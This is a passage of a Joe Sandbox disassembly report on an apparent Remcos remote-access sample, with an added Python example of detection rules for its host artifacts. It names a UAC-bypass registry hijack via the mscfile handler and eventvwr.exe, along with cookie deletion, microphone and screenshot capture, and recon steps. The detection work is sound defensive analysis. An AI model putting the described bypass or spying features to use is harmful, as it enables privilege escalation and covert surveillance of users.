            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
            • String ID:
            • API String ID: 2172192267-0
            • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
            • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
            • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
            • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
            APIs
            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
            • __fassign.LIBCMT ref: 00447814
            • __fassign.LIBCMT ref: 0044782F
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
            • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
            • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
            • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
            • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
            • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: _free
            • String ID: $-E$$-E
            • API String ID: 269201875-3140958853
            • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
            • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
            • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
            • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
            APIs
            • _strftime.LIBCMT ref: 00401D30
              • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
            • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
            • String ID: %Y-%m-%d %H.%M$.wav
            • API String ID: 3809562944-3597965672
            • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
            • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
            • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
            • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
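Several of the functions above leave host artifacts that are easier to hunt for than the binary itself: the function at 00406775 writes Software\Classes\mscfile\shell\open\command and launches eventvwr.exe (the user-hive mscfile handler hijack used to run code under the auto-elevated Event Viewer); 00415A1A runs dxdiag /t <temp>\sysinfo.txt for host recon; 00417F6F names screenshots time_%04i%02i%02i_%02i%02i%02i and wnd_%04i%02i%02i_%02i%02i%02i; 00406A56 stages downloads as <name>.part before MoveFileW renames them; and 00401D30 names microphone captures with the "%Y-%m-%d %H.%M" format plus .wav. The following is an added example, not code from the Joe Sandbox report or from the sample: triage rules for those artifacts run over a handful of constructed Sysmon-style events. The Sysmon field names (EventID 1 process create, 11 file create, 13 registry value set) are real, but the events, paths, SID and tag names are made up for the example, and the screenshot file extension is assumed because the report does not show it. The eventvwr.exe launch is only flagged once a mscfile handler write has been seen in the same stream, since Event Viewer starting on its own is benign.

```python
"""Added example (not from the Joe Sandbox report or the sample): host-side
triage of the file, registry and process artifacts this Remcos sample leaves,
evaluated against constructed Sysmon-style events. Field names follow Sysmon
(EventID 1 = process create, 11 = file create, 13 = registry value set); the
event contents below are invented for the example."""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    event_id: int
    image: str = ""
    command_line: str = ""
    target_object: str = ""     # registry path for EventID 13
    target_filename: str = ""   # created file for EventID 11


# 00406775: HKCU\Software\Classes\mscfile\shell\open\command + eventvwr.exe
MSCFILE_RE = re.compile(r"\\Software\\Classes\\mscfile\\shell\\open\\command$", re.I)
EVENTVWR_RE = re.compile(r"\\eventvwr\.exe$", re.I)
# 00415A1A: ShellExecuteW("open", "dxdiag", "/t " + temp + "\sysinfo.txt")
DXDIAG_RE = re.compile(r"\bdxdiag(\.exe)?\s+/t\s+\S*\\sysinfo\.txt\b", re.I)
# 00417F6F: time_YYYYMMDD_HHMMSS / wnd_YYYYMMDD_HHMMSS; extension is assumed.
SCREENSHOT_RE = re.compile(r"(?:^|\\)(?:time|wnd)_\d{8}_\d{6}\.\w+$", re.I)
# 00401D30: strftime("%Y-%m-%d %H.%M") + ".wav"
WAV_RE = re.compile(r"(?:^|\\)\d{4}-\d{2}-\d{2} \d{2}\.\d{2}\.wav$")
# 00406A56: download written to "<name>.part", then renamed with MoveFileW
PART_RE = re.compile(r"\.part$", re.I)


def triage(ev: Event) -> List[str]:
    """Stateless per-event rules. Tag names are this example's own."""
    tags = []
    if ev.event_id == 13 and MSCFILE_RE.search(ev.target_object):
        tags.append("uac_bypass_mscfile_hijack")
    if ev.event_id == 1 and DXDIAG_RE.search(ev.command_line):
        tags.append("recon_dxdiag_sysinfo")
    if ev.event_id == 11:
        if SCREENSHOT_RE.search(ev.target_filename):
            tags.append("screenshot_capture_naming")
        if WAV_RE.search(ev.target_filename):
            tags.append("audio_capture_naming")
        if PART_RE.search(ev.target_filename):
            tags.append("staged_download_part_file")
    return tags


def triage_stream(events: List[Event]):
    """Run the rules over an ordered event stream and return
    [(index, tags)] for events that fired. eventvwr.exe is only flagged
    after a mscfile handler write has been seen, which is the order the
    function at 00406775 produces (write key, ShellExecuteW, ExitProcess)."""
    findings = []
    mscfile_hijacked = False
    for i, ev in enumerate(events):
        tags = triage(ev)
        if "uac_bypass_mscfile_hijack" in tags:
            mscfile_hijacked = True
        if ev.event_id == 1 and mscfile_hijacked and EVENTVWR_RE.search(ev.image):
            tags.append("uac_bypass_eventvwr_trigger")
        if tags:
            findings.append((i, tags))
    return findings


# Constructed events. Paths, SID and order are invented; the benign
# eventvwr launch at index 0 must NOT fire, the one at index 2 must.
EVENTS = [
    Event(1, image=r"C:\Windows\System32\eventvwr.exe"),
    Event(13, image=r"C:\Users\user\AppData\Roaming\example\sample.exe",
          target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\mscfile\shell\open\command"),
    Event(1, image=r"C:\Windows\System32\eventvwr.exe"),
    Event(1, image=r"C:\Windows\System32\dxdiag.exe",
          command_line=r"dxdiag /t C:\Users\user\AppData\Local\Temp\sysinfo.txt"),
    Event(11, target_filename=r"C:\Users\user\AppData\Roaming\example\time_20240823_142501.jpg"),
    Event(11, target_filename=r"C:\Users\user\AppData\Roaming\example\2024-08-23 14.25.wav"),
    Event(11, target_filename=r"C:\Users\user\AppData\Local\Temp\update.exe.part"),
    Event(11, target_filename=r"C:\Users\user\Documents\report.docx"),
]

if __name__ == "__main__":
    for idx, tags in triage_stream(EVENTS):
        print(idx, EVENTS[idx].event_id, ", ".join(tags))
```

The .part and screenshot rules will fire on unrelated software (browsers stage downloads as .part too), so treat them as corroborating signals for the registry and process rules rather than alerts in their own right; the mscfile write under a user hive followed by eventvwr.exe is the high-confidence pair.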
            APIs
              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
            • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
            • API String ID: 1133728706-4073444585
            • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
            • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
            • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
            • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
            • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
            • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
            • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
            APIs
              • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
            • _free.LIBCMT ref: 0044E128
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044E133
            • _free.LIBCMT ref: 0044E13E
            • _free.LIBCMT ref: 0044E192
            • _free.LIBCMT ref: 0044E19D
            • _free.LIBCMT ref: 0044E1A8
            • _free.LIBCMT ref: 0044E1B3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
            • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
            • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
            • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
            APIs
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
            • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCurrentOpenProcessQueryValue
            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 1866151309-2070987746
            • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
            • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
            • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
            • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
            APIs
            • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
            • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
            • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
            • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
            • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
            APIs
            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
            • GetLastError.KERNEL32 ref: 0040AA28
            Strings
            • [Chrome Cookies not found], xrefs: 0040AA42
            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
            • UserProfile, xrefs: 0040A9EE
            • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DeleteErrorFileLast
            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
            • API String ID: 2018770650-304995407
            • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
            • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
            • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
            • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
            APIs
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
            • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
            • Sleep.KERNEL32(00002710), ref: 00418DBD
            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: PlaySound$HandleLocalModuleSleepTime
            • String ID: Alarm triggered$`#v
            • API String ID: 614609389-3049340936
            • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
            • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
            • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
            • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
            APIs
            • __allrem.LIBCMT ref: 00438A09
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
            • __allrem.LIBCMT ref: 00438A3C
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
            • __allrem.LIBCMT ref: 00438A71
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1992179935-0
            • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
            • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
            • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
            • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe
            • String ID:
            • API String ID: 4189289331-0
            • Opcode ID: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
            • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
            • Opcode Fuzzy Hash: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
            • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __freea$__alloca_probe_16_free
            • String ID: a/p$am/pm
            • API String ID: 2936374016-3206640213
            • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
            • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
            • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
            • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
            • int.LIBCPMT ref: 0040F8D7
              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
            • std::_Facet_Register.LIBCPMT ref: 0040F917
            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
            • __Init_thread_footer.LIBCMT ref: 0040F97F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
            • String ID:
            • API String ID: 3815856325-0
            • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
            • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
            • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
            • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ChangeConfigManager
            • String ID:
            • API String ID: 493672254-0
            • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
            • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
            • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
            • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
            APIs
            • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
            • _free.LIBCMT ref: 0044575C
            • _free.LIBCMT ref: 00445784
            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
            • _abort.LIBCMT ref: 004457A3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free$_abort
            • String ID:
            • API String ID: 3160817290-0
            • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
            • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
            • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
            • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
            • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
            • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
            • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
            • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
            • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
            • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
            • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
            • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
